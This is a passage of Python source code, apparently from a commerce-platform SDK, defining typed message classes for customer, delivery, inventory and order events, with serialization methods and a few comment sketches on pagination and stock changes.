old_slug: typing.Optional["LocalizedString"] = None
):
self.slug = slug
self.old_slug = old_slug
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CategorySlugChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CategorySlugChangedMessage":
from ._schemas.message import CategorySlugChangedMessageSchema
return CategorySlugChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CategorySlugChangedMessageSchema
return CategorySlugChangedMessageSchema().dump(self)
class CustomLineItemStateTransitionMessage(Message):
custom_line_item_id: str
transition_date: datetime.datetime
quantity: int
from_state: "StateReference"
to_state: "StateReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
custom_line_item_id: str,
transition_date: datetime.datetime,
quantity: int,
from_state: "StateReference",
to_state: "StateReference"
):
self.custom_line_item_id = custom_line_item_id
self.transition_date = transition_date
self.quantity = quantity
self.from_state = from_state
self.to_state = to_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomLineItemStateTransition",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomLineItemStateTransitionMessage":
from ._schemas.message import CustomLineItemStateTransitionMessageSchema
return CustomLineItemStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomLineItemStateTransitionMessageSchema
return CustomLineItemStateTransitionMessageSchema().dump(self)
class CustomerAddressAddedMessage(Message):
address: "Address"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
address: "Address"
):
self.address = address
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerAddressAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerAddressAddedMessage":
from ._schemas.message import CustomerAddressAddedMessageSchema
return CustomerAddressAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerAddressAddedMessageSchema
return CustomerAddressAddedMessageSchema().dump(self)
class CustomerAddressChangedMessage(Message):
address: "Address"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
address: "Address"
):
self.address = address
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerAddressChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerAddressChangedMessage":
from ._schemas.message import CustomerAddressChangedMessageSchema
return CustomerAddressChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerAddressChangedMessageSchema
return CustomerAddressChangedMessageSchema().dump(self)
class CustomerAddressRemovedMessage(Message):
address: "Address"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
address: "Address"
):
self.address = address
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerAddressRemoved",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerAddressRemovedMessage":
from ._schemas.message import CustomerAddressRemovedMessageSchema
return CustomerAddressRemovedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerAddressRemovedMessageSchema
return CustomerAddressRemovedMessageSchema().dump(self)
class CustomerCompanyNameSetMessage(Message):
company_name: str
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
company_name: str
):
self.company_name = company_name
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerCompanyNameSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerCompanyNameSetMessage":
from ._schemas.message import CustomerCompanyNameSetMessageSchema
return CustomerCompanyNameSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerCompanyNameSetMessageSchema
return CustomerCompanyNameSetMessageSchema().dump(self)
class CustomerCreatedMessage(Message):
customer: "Customer"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
customer: "Customer"
):
self.customer = customer
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerCreated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerCreatedMessage":
from ._schemas.message import CustomerCreatedMessageSchema
return CustomerCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerCreatedMessageSchema
return CustomerCreatedMessageSchema().dump(self)
class CustomerDateOfBirthSetMessage(Message):
date_of_birth: datetime.date
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
date_of_birth: datetime.date
):
self.date_of_birth = date_of_birth
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerDateOfBirthSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerDateOfBirthSetMessage":
from ._schemas.message import CustomerDateOfBirthSetMessageSchema
return CustomerDateOfBirthSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerDateOfBirthSetMessageSchema
return CustomerDateOfBirthSetMessageSchema().dump(self)
class CustomerEmailChangedMessage(Message):
email: str
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
email: str
):
self.email = email
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerEmailChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerEmailChangedMessage":
from ._schemas.message import CustomerEmailChangedMessageSchema
return CustomerEmailChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerEmailChangedMessageSchema
return CustomerEmailChangedMessageSchema().dump(self)
class CustomerEmailVerifiedMessage(Message):
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None
):
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerEmailVerified",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerEmailVerifiedMessage":
from ._schemas.message import CustomerEmailVerifiedMessageSchema
return CustomerEmailVerifiedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerEmailVerifiedMessageSchema
return CustomerEmailVerifiedMessageSchema().dump(self)
class CustomerGroupSetMessage(Message):
customer_group: "CustomerGroupReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
customer_group: "CustomerGroupReference"
):
self.customer_group = customer_group
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerGroupSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerGroupSetMessage":
from ._schemas.message import CustomerGroupSetMessageSchema
return CustomerGroupSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerGroupSetMessageSchema
return CustomerGroupSetMessageSchema().dump(self)
class CustomerPasswordUpdatedMessage(Message):
#: true, if password has been updated during Customer's Password Reset workflow.
reset: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
reset: bool
):
self.reset = reset
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerPasswordUpdated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerPasswordUpdatedMessage":
from ._schemas.message import CustomerPasswordUpdatedMessageSchema
return CustomerPasswordUpdatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerPasswordUpdatedMessageSchema
return CustomerPasswordUpdatedMessageSchema().dump(self)
class DeliveryAddedMessage(Message):
delivery: "Delivery"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery: "Delivery"
):
self.delivery = delivery
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="DeliveryAdded",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "DeliveryAddedMessage":
from ._schemas.message import DeliveryAddedMessageSchema
return DeliveryAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryAddedMessageSchema
return DeliveryAddedMessageSchema().dump(self)
class DeliveryAddressSetMessage(Message):
delivery_id: str
address: typing.Optional["Address"]
old_address: typing.Optional["Address"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery_id: str,
address: typing.Optional["Address"] = None,
old_address: typing.Optional["Address"] = None
):
self.delivery_id = delivery_id
self.address = address
self.old_address = old_address
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="DeliveryAddressSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryAddressSetMessage":
from ._schemas.message import DeliveryAddressSetMessageSchema
return DeliveryAddressSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryAddressSetMessageSchema
return DeliveryAddressSetMessageSchema().dump(self)
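# Consumer-side sketch (an assumption about typical handling, not generated
# code): because both ``address`` and ``old_address`` are optional, a handler
# can tell whether a delivery address was added, removed, or replaced:
#
#     def classify_address_change(msg: DeliveryAddressSetMessage) -> str:
#         if msg.address is not None and msg.old_address is None:
#             return "added"
#         if msg.address is None and msg.old_address is not None:
#             return "removed"
#         return "changed"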
class DeliveryItemsUpdatedMessage(Message):
delivery_id: str
items: typing.List["DeliveryItem"]
old_items: typing.List["DeliveryItem"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery_id: str,
items: typing.List["DeliveryItem"],
old_items: typing.List["DeliveryItem"]
):
self.delivery_id = delivery_id
self.items = items
self.old_items = old_items
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="DeliveryItemsUpdated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryItemsUpdatedMessage":
from ._schemas.message import DeliveryItemsUpdatedMessageSchema
return DeliveryItemsUpdatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryItemsUpdatedMessageSchema
return DeliveryItemsUpdatedMessageSchema().dump(self)
class DeliveryRemovedMessage(Message):
delivery: "Delivery"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery: "Delivery"
):
self.delivery = delivery
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="DeliveryRemoved",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryRemovedMessage":
from ._schemas.message import DeliveryRemovedMessageSchema
return DeliveryRemovedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryRemovedMessageSchema
return DeliveryRemovedMessageSchema().dump(self)
class InventoryEntryCreatedMessage(Message):
inventory_entry: "InventoryEntry"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
inventory_entry: "InventoryEntry"
):
self.inventory_entry = inventory_entry
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="InventoryEntryCreated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "InventoryEntryCreatedMessage":
from ._schemas.message import InventoryEntryCreatedMessageSchema
return InventoryEntryCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import InventoryEntryCreatedMessageSchema
return InventoryEntryCreatedMessageSchema().dump(self)
class InventoryEntryDeletedMessage(Message):
sku: str
supply_channel: "ChannelReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
sku: str,
supply_channel: "ChannelReference"
):
self.sku = sku
self.supply_channel = supply_channel
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="InventoryEntryDeleted",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "InventoryEntryDeletedMessage":
from ._schemas.message import InventoryEntryDeletedMessageSchema
return InventoryEntryDeletedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import InventoryEntryDeletedMessageSchema
return InventoryEntryDeletedMessageSchema().dump(self)
class InventoryEntryQuantitySetMessage(Message):
old_quantity_on_stock: int
new_quantity_on_stock: int
old_available_quantity: int
new_available_quantity: int
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
old_quantity_on_stock: int,
new_quantity_on_stock: int,
old_available_quantity: int,
new_available_quantity: int
):
self.old_quantity_on_stock = old_quantity_on_stock
self.new_quantity_on_stock = new_quantity_on_stock
self.old_available_quantity = old_available_quantity
self.new_available_quantity = new_available_quantity
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="InventoryEntryQuantitySet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "InventoryEntryQuantitySetMessage":
from ._schemas.message import InventoryEntryQuantitySetMessageSchema
return InventoryEntryQuantitySetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import InventoryEntryQuantitySetMessageSchema
return InventoryEntryQuantitySetMessageSchema().dump(self)
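# Sketch (illustrative helper, not part of the SDK): the paired old/new fields
# on InventoryEntryQuantitySetMessage make the stock movement trivial to derive
# when reacting to the message:
#
#     def stock_delta(msg: InventoryEntryQuantitySetMessage) -> int:
#         # Positive when stock was added, negative when stock was removed.
#         return msg.new_quantity_on_stock - msg.old_quantity_on_stock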
class LineItemStateTransitionMessage(Message):
line_item_id: str
transition_date: datetime.datetime
quantity: int
from_state: "StateReference"
to_state: "StateReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
line_item_id: str,
transition_date: datetime.datetime,
quantity: int,
from_state: "StateReference",
to_state: "StateReference"
):
self.line_item_id = line_item_id
self.transition_date = transition_date
self.quantity = quantity
self.from_state = from_state
self.to_state = to_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="LineItemStateTransition",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "LineItemStateTransitionMessage":
from ._schemas.message import LineItemStateTransitionMessageSchema
return LineItemStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import LineItemStateTransitionMessageSchema
return LineItemStateTransitionMessageSchema().dump(self)
class MessageConfiguration(_BaseType):
enabled: bool
delete_days_after_creation: typing.Optional[int]
def __init__(
self, *, enabled: bool, delete_days_after_creation: typing.Optional[int] = None
):
self.enabled = enabled
self.delete_days_after_creation = delete_days_after_creation
super().__init__()
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "MessageConfiguration":
from ._schemas.message import MessageConfigurationSchema
return MessageConfigurationSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import MessageConfigurationSchema
return MessageConfigurationSchema().dump(self)
class MessageConfigurationDraft(_BaseType):
enabled: bool
delete_days_after_creation: int
def __init__(self, *, enabled: bool, delete_days_after_creation: int):
self.enabled = enabled
self.delete_days_after_creation = delete_days_after_creation
super().__init__()
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "MessageConfigurationDraft":
from ._schemas.message import MessageConfigurationDraftSchema
return MessageConfigurationDraftSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import MessageConfigurationDraftSchema
return MessageConfigurationDraftSchema().dump(self)
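# Sketch: MessageConfigurationDraft mirrors MessageConfiguration but requires
# ``delete_days_after_creation``; both constructor arguments are keyword-only.
# The 15-day retention below is an arbitrary example value, not an API default:
#
#     draft = MessageConfigurationDraft(enabled=True, delete_days_after_creation=15)
#     body = draft.serialize()  # plain dict, e.g. for a project settings update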
class MessagePagedQueryResponse(_BaseType):
limit: int
count: int
total: typing.Optional[int]
offset: int
results: typing.List["Message"]
def __init__(
self,
*,
limit: int,
count: int,
total: typing.Optional[int] = None,
offset: int,
results: typing.List["Message"]
):
self.limit = limit
self.count = count
self.total = total
self.offset = offset
self.results = results
super().__init__()
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "MessagePagedQueryResponse":
from ._schemas.message import MessagePagedQueryResponseSchema
return MessagePagedQueryResponseSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import MessagePagedQueryResponseSchema
return MessagePagedQueryResponseSchema().dump(self)
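# Pagination sketch (``fetch_messages_page`` and ``handle`` are hypothetical
# helpers standing in for the actual HTTP call and the business logic): the
# ``limit`` / ``offset`` / ``count`` / ``total`` fields support the usual
# offset-based paging loop:
#
#     offset = 0
#     while True:
#         page = fetch_messages_page(offset=offset)  # -> MessagePagedQueryResponse
#         for message in page.results:
#             handle(message)
#         offset += page.count
#         if page.count == 0 or (page.total is not None and offset >= page.total):
#             break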
class OrderBillingAddressSetMessage(Message):
address: typing.Optional["Address"]
old_address: typing.Optional["Address"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
address: typing.Optional["Address"] = None,
old_address: typing.Optional["Address"] = None
):
self.address = address
self.old_address = old_address
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderBillingAddressSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderBillingAddressSetMessage":
from ._schemas.message import OrderBillingAddressSetMessageSchema
return OrderBillingAddressSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderBillingAddressSetMessageSchema
return OrderBillingAddressSetMessageSchema().dump(self)
class OrderCreatedMessage(Message):
order: "Order"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
order: "Order"
):
self.order = order
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderCreated",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "OrderCreatedMessage":
from ._schemas.message import OrderCreatedMessageSchema
return OrderCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCreatedMessageSchema
return OrderCreatedMessageSchema().dump(self)
class OrderCustomLineItemDiscountSetMessage(Message):
custom_line_item_id: str
discounted_price_per_quantity: typing.List["DiscountedLineItemPriceForQuantity"]
taxed_price: typing.Optional["TaxedItemPrice"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
custom_line_item_id: str,
discounted_price_per_quantity: typing.List[
"DiscountedLineItemPriceForQuantity"
],
taxed_price: typing.Optional["TaxedItemPrice"] = None
):
self.custom_line_item_id = custom_line_item_id
self.discounted_price_per_quantity = discounted_price_per_quantity
self.taxed_price = taxed_price
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderCustomLineItemDiscountSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomLineItemDiscountSetMessage":
from ._schemas.message import OrderCustomLineItemDiscountSetMessageSchema
return OrderCustomLineItemDiscountSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomLineItemDiscountSetMessageSchema
return OrderCustomLineItemDiscountSetMessageSchema().dump(self)
class OrderCustomerEmailSetMessage(Message):
email: typing.Optional[str]
old_email: typing.Optional[str]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
email: typing.Optional[str] = None,
old_email: typing.Optional[str] = None
):
self.email = email
self.old_email = old_email
super().__init__(
id=id,
version=version,
created_at=created_at,
